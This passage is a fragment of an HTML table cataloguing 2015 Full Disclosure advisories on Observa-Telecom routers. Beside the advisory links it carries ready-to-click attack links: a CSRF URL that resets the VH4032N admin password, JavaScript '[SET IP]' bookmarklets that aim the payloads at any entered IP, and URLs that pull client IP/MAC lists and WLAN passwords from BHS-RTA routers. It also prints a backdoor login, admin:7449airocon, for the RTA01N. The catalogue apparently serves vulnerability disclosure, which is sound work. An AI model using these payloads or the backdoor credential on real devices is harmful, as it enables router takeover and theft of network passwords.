</td>
<td>
<a href="http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass">
Observa-Telecom VH4032N VH4032N_V0.2.35 CSRF change admin password</a>
<a href="javascript:document.location='http://'+prompt('IP')+'/en_US/administration.cgi?usrPassword='+prompt('New password')">
[SET IP]
</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Observa-Telecom VH4032N VH4032N_V0.2.35 Persistent Cross Site Scripting</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Observa-Telecom Home Station BHS-RTA v1.1.3 Universal Plug and Play</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
One click
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101">
Observa-Telecom Home Station BHS-RTA v1.1.3 Information Disclosure IP and MAC of clients</a>
<a href="javascript:'http://'+prompt('IP')+'/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101'">
[SET IP]</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
One click
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101">
Observa-Telecom Home Station BHS-RTA v1.1.3 Information Disclosure WLAN passwords</a>
<a href="javascript:'http://'+prompt(IP)+'/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101'">
[SET IP]</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Observa-Telecom RTA01N RTK_V2.2.13 Universal Plug and Play</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
RTA01N RTA01N RTK_V2.2.13 Backdoor admin:7449airocon</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>